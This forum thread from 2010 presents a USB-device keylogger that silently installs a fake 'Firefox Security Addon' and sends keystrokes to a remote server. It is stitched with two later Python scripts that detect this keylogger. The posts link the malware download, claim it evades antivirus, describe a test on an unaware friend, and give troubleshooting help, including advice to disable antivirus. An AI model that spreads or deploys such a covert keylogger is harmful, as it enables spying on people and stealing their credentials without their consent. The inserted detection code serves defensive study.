sandred, posted May 16, 2010

By using the combination of Cerolobo's code (though I am not Base64 encrypting it) to upload files and Vile's style of calling the command prompt, I made a proof-of-concept keylogger plugin installation for Firefox. When the Teensy is inserted into USB, it uploads the plugin files into the C:\kl folder (please delete the folder if it already exists) and then proceeds to install the plugin into Firefox by adding a registry key into HKCU\Software\Mozilla\Firefox\Extensions. If Firefox is already running then it is killed and restarted immediately to install the plugin. If not, then the plugin (displayed as "Firefox Security Addon") loads when Firefox starts the next time. If everything goes fine, it will be done in 10 secs. The keystrokes are then sent to a remote server (specified in the code). The remote server then captures the keystrokes, time stamps and IP stamps (Bonus! we get the IP too) the data and logs it.

Please keep in mind that this is by no means polished or optimized code; bugs will exist. So watch out. I quickly copy-pasted everything together and tested it. It works beautifully on XP x64 and Win 7 x64. I don't see why this can not be implemented in a more sophisticated way for other plugin-supported browsers and for all OSs. I would love to see somebody optimize it.

Download the code from here: http://karmetasploit.com/KL/AllFiles.zip

If you do not bother to change the server or just want to test it, then the logs are currently stored in this location: http://karmetasploit.com/KL/logger.txt

Some plus points with these kinds of keyloggers:
- It works behind whatever firewalls as long as Firefox gets the internet.
- 100% AV undetectable.
- You can decide to log or not to log based on IP.
- Why bother stealing cookies when you can get all the keystrokes. :)
Elementix, posted May 16, 2010 (edited)

Can you go into a little more detail on how exactly this works? Does the FF plugin go onto a separate thumb drive, or does it download the plugin then install it? The rest of it seems pretty straightforward.

Edited May 16, 2010 by Elementix
Paul Stoffregen, posted May 17, 2010 (edited)

You could try looking at the code! It's only 219 lines (plus a 7-line PHP script). Much of it is just strings which encode the "payload", which is only 41 lines (about 1400 bytes), mostly a tiny JavaScript fragment and some XML. He put the plugin files in a subdirectory, so you can look at them naturally instead of inside strings. The plugin is only 3 tiny files totaling 41 lines. The actual JavaScript code is only 11 lines! There's no large, complex binary. It's all just simple, tiny text files you can look at using any lame program, even Notepad.

> Can you go into a little more detail on how exactly this works?

If you'd read the code, it's pretty easy to see those 11 JavaScript lines just add an "onkey" event listener, which packs every 20 keystrokes into the query string on an HTTP GET request to a particular URL. The 7 lines of PHP receive it and put it into a file. There's some XML which presumably the browser's plugin install process wants. The actual code basically just types these tiny files in, then adds a registry key. Maybe I missed a detail or two, but that's the gist of it.

If there were ever a scary example of why modern operating systems are going to have to rethink their trust model for HID, this is certainly it. Scary, but pretty amazing, in a creepy kind of way. If anyone at Microsoft, Apple or any Linux kernel developer doesn't believe blindly trusting all HID devices is a real issue, all they need to do is take one look at this!

To be honest, I had absolutely no idea a keystroke logging plugin would be so tiny and so simple. I also never imagined people would make these kinds of things when I created Teensy. Please please please be responsible with this stuff.

Edited May 17, 2010 by Paul Stoffregen
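The upload pattern Paul describes (one short GET per batch of keystrokes, always to the same URL, sent by the browser itself) is something a server-side or proxy log review can key on. The following is an added example, not code from the thread; the log lines are constructed in Apache combined format, the /KL/ path follows the thread's server layout, and the client addresses and timestamps are invented.

```python
# Added example: flag access-log traffic shaped like per-batch keystroke
# uploads: one client, one path, several referer-less GETs with a query
# string inside a short window. Log lines below are constructed.
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"GET (?P<path>[^ ?"]+)(?P<q>\?[^ "]*)? HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

SAMPLE_LOG = """\
10.0.0.7 - - [17/May/2010:10:00:01 +0000] "GET /KL/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [17/May/2010:10:00:09 +0000] "GET /KL/log.php?k=hello+world+this+is HTTP/1.1" 200 5 "-" "Mozilla/5.0"
10.0.0.7 - - [17/May/2010:10:00:16 +0000] "GET /KL/log.php?k=a+secret+passwor HTTP/1.1" 200 5 "-" "Mozilla/5.0"
10.0.0.7 - - [17/May/2010:10:00:21 +0000] "GET /KL/log.php?k=d+that+nobody+kn HTTP/1.1" 200 5 "-" "Mozilla/5.0"
10.0.0.9 - - [17/May/2010:10:00:30 +0000] "GET /index.html HTTP/1.1" 200 2048 "http://example.test/" "Mozilla/5.0"
"""


def parse(log_text):
    """Yield one dict per well-formed combined-format line, ts as datetime."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield rec


def exfil_candidates(log_text, min_hits=3, window_s=60):
    """(ip, path) pairs with >= min_hits referer-less GETs that carry a query
    string within window_s seconds, i.e. the shape of batched keystroke posts."""
    hits = defaultdict(list)
    for rec in parse(log_text):
        if rec["q"] and rec["ref"] == "-":
            hits[(rec["ip"], rec["path"])].append(rec["ts"])
    flagged = []
    for key, times in hits.items():
        times.sort()
        for i in range(len(times) - min_hits + 1):
            if (times[i + min_hits - 1] - times[i]).total_seconds() <= window_s:
                flagged.append(key)
                break
    return flagged


if __name__ == "__main__":
    for ip, path in exfil_candidates(SAMPLE_LOG):
        print(f"possible keystroke exfil: {ip} -> {path}")
```

Thresholds are a starting point; on a busy site tune min_hits and window_s against the normal rate of query-string GETs to the same path from one client.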
Elementix, posted May 17, 2010

> You could try looking at the code! It's only 219 lines (plus a 7-line PHP script). Much of it is just strings which encode the "payload", which is only 41 lines (about 1400 bytes), mostly a tiny JavaScript fragment and some XML. He put the plugin files in a subdirectory, so you can look at them naturally instead of inside strings. The plugin is only 3 tiny files totaling 41 lines. The actual JavaScript code is only 11 lines! There's no large, complex binary. It's all just simple, tiny text files you can look at using any lame program, even Notepad.
>
> If you'd read the code, it's pretty easy to see those 11 JavaScript lines just add an "onkey" event listener, which packs every 20 keystrokes into the query string on an HTTP GET request to a particular URL. The 7 lines of PHP receive it and put it into a file. There's some XML which presumably the browser's plugin install process wants. The actual code basically just types these tiny files in, then adds a registry key. Maybe I missed a detail or two, but that's the gist of it.
>
> If there were ever a scary example of why modern operating systems are going to have to rethink their trust model for HID, this is certainly it. Scary, but pretty amazing, in a creepy kind of way. If anyone at Microsoft, Apple or any Linux kernel developer doesn't believe blindly trusting all HID devices is a real issue, all they need to do is take one look at this!
>
> To be honest, I had absolutely no idea a keystroke logging plugin would be so tiny and so simple. I also never imagined people would make these kinds of things when I created Teensy. Please please please be responsible with this stuff.

Well, thanks for assuming that I asked a question without looking things over. I DID look at the code, but just because I'm here doesn't mean I know all the ins and outs of how everything works, so chill out with that crap.

With that being said, are all these files just flashed onto the Teensy (besides the PHP script)? I'm just a bit confused...
Sl45h3R, posted May 17, 2010

By the sound of what he said, I think they are stored in the actual source itself, and then "echo"ed into a file on the computer.
sandred (Author), posted May 17, 2010

All the code does is create a "C:\kl" folder and "print" three files to it. Once it prints the files, it just adds a registry entry into HKCU (which does not need admin rights) to say to Firefox "Hey, there is a plugin that you need to load at C:\kl", and when Firefox starts it loads the code. Once loaded, the plugin watches all the keystrokes made into the browser and quietly posts them to the remote server. The PHP script is placed on the server, which then takes these keys sent and stores them to a file.

You do not need to load these files into the Teensy. All you need to do is compile the code in Arduino and flash the Teensy with it. When you plug in the Teensy, it just echoes the code to the files and does the rest of that stuff. You can just try it as it is without changing anything. You can always uninstall it after testing.

Yes, the keylogger is very simple and very effective and completely undetectable, as it is effectively just 2 lines of JavaScript running inside a browser. I already field tested it on one of my friends' computers and he does not think anything ever happened at all when the Teensy installed it. I had to explain the details to him and even after that he does not really believe that's possible. Well, educate the masses, I guess.
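Because the whole install is a per-user registry value under HKCU\Software\Mozilla\Firefox\Extensions pointing at a directory, that key is also the cheapest place to audit for it. The following is an added example, not code from the thread or from the posted keylogger: it parses a `reg export` of that key and reports any extension whose install path lies outside the directories where a legitimate installer would put one. The sample export is constructed; the C:\kl path is the one the thread describes, and both extension IDs are placeholders, not the real add-on's ID.

```python
# Added example: audit HKCU\Software\Mozilla\Firefox\Extensions for extensions
# registered from unexpected directories. Input is the text produced by
#   reg export "HKCU\Software\Mozilla\Firefox\Extensions" ext.reg
# (reg export writes UTF-16LE; decode the file before passing the text in).
import re
from pathlib import PureWindowsPath

EXT_KEY = r"HKEY_CURRENT_USER\Software\Mozilla\Firefox\Extensions"

# Install locations treated as plausible; anything else (C:\kl, %TEMP%, the
# desktop, ...) is reported. Extend this for your own packaging conventions.
TRUSTED_PREFIXES = (
    PureWindowsPath(r"C:\Program Files"),
    PureWindowsPath(r"C:\Program Files (x86)"),
)

# Constructed sample export; extension IDs are placeholders, C:\kl is the
# directory the thread describes.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Mozilla\Firefox\Extensions]
"{11111111-2222-3333-4444-555555555555}"="C:\\Program Files\\Vendor\\ffext"
"{00000000-0000-0000-0000-00000000c0de}"="C:\\kl"
"""

_VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_extension_values(reg_text):
    """Return {extension_id: install_path} for string values under EXT_KEY."""
    found, in_key = {}, False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == EXT_KEY.lower()
            continue
        m = _VALUE_RE.match(line) if in_key else None
        if m:  # .reg escapes quotes and doubles backslashes in string values
            found[m.group(1)] = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
    return found


def suspicious_extensions(reg_text):
    """(extension_id, path) pairs whose path is outside every trusted prefix."""
    flagged = []
    for ext_id, path in parse_extension_values(reg_text).items():
        p = PureWindowsPath(path)
        if not any(p == t or t in p.parents for t in TRUSTED_PREFIXES):
            flagged.append((ext_id, path))
    return flagged


if __name__ == "__main__":
    for ext_id, path in suspicious_extensions(SAMPLE_REG):
        print(f"SUSPICIOUS: {ext_id} registered from {path}")
```

Firefox honours the same Extensions key under HKLM as well, so a full check exports and audits both hives.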
Elementix, posted May 17, 2010

Ok, so I understand how things work now and I got things running for the most part... but for some reason it isn't working. It doesn't look like it adds anything new into the Mozilla portion of the registry and I don't see any new plugins/addons in Firefox. I've tried on 3 different PCs and I'm kinda stuck right now... any thoughts?
Sl45h3R, posted May 17, 2010

Have a look in the registry to see if it adds the entry. I know Defense+ (Comodo) blocks unauthorized access to the registry; try disabling all your antivirus/firewall solutions and try it.
sandred (Author), posted May 17, 2010

> Ok, so I understand how things work now and I got things running for the most part... but for some reason it isn't working. It doesn't look like it adds anything new into the Mozilla portion of the registry and I don't see any new plugins/addons in Firefox. I've tried on 3 different PCs and I'm kinda stuck right now... any thoughts?

If you have a folder C:\kl (maybe from previous runs), then you have to delete it before running it again. Try that, and try to plug it in with nothing else running on your computer; maybe your computer is slow at multitasking and missing some keystrokes.
Elementix, posted May 17, 2010

Well, that's not the problem... I'm on a quad-core machine with 3 gigs of RAM. I've tried it on my PC, which is running a 32-bit copy of Windows 7, and I also tried it in 2 separate virtual machines running a fresh install of XP with Firefox installed. It does seem like it's working, but everything is going so fast I can't even see if there are any errors being displayed...

All I did was change the website path in your code to the path to my logger.txt file and my hosted .php file. That's all I should have to mess with, right?
Elementix, posted May 17, 2010 (edited)

Well, apparently it just decided that it wanted to start working... Thanks anyway guys. :)

Edit: Ok, so it worked on a new virtual machine with XP but it doesn't seem to want to work with my clean install of Windows 7 on my actual machine... *sigh*... guess I'll keep playing with it...

Edited May 17, 2010 by Elementix
Bobbers, posted May 19, 2010

Sweet, I can't wait to look at it! School blocked the keyword .zip
Elementix, posted May 19, 2010

It works great when it does work. I'm not sure what's different about the 2 different computers I tried it on. Both of them were fresh installs of Windows 7 from the same disc. Only Firefox installed and nothing else. One's a desktop, and one's a laptop, but only the laptop seemed to install it. Just don't know what could be different...
DJ Felix, posted June 14, 2010

Looks like the site is down. Anyone have a mirror URL?
fitzdaddy, posted June 15, 2010

Does anyone have the source code for this? The link is no longer working.
sandred (Author), posted June 15, 2010

> Does anyone have the source code for this? The link is no longer working.

I have put them back. Let me know if you have a problem.
fitzdaddy, posted June 17, 2010

> I have put them back. Let me know if you have a problem.

Sandyreddy,

Thanks for putting this back up. I had a little trouble compiling it in Arduino due to it not finding the header file. After renaming the header file the whole thing worked like a charm.

Specs:
- 32-bit XP as a VM
- Firefox version 3.5.7

Fitzdaddy
fitzdaddy, posted June 21, 2010

Fellow Teensy Fans,

Here is my whack at the keylogger for Firefox. I have done a little housecleaning on the source code (neat freak) and added support for Linux. Currently I use the command gnome-terminal to get a shell, so it will only work in Gnome Linux distributions. For some reason the Arduino IDE did not like the name keylogger anymore, so I had to rename it. Future improvements could be to suppress notification of additional extensions and cleaning up the presentation of the Windows command prompt. I hope it is clear from the source code that much credit goes to Sandyreddy and those that he got inspiration from.

http://dl.dropbox.com/u/1588928/fflogger.tar.gz

Fitzdaddy
Carol, posted August 5, 2011

So smart to have a deep study on keylogger things, Sandred. I think it is very difficult and complicated... so even when I needed one to use on my laptop, I just bought one online knowing nothing about it. But luck is that it works not bad.
Carol, posted August 8, 2011

Oh, sorry, forgot to say that the keylogging program I am using is the Amac keylogger for Mac last time...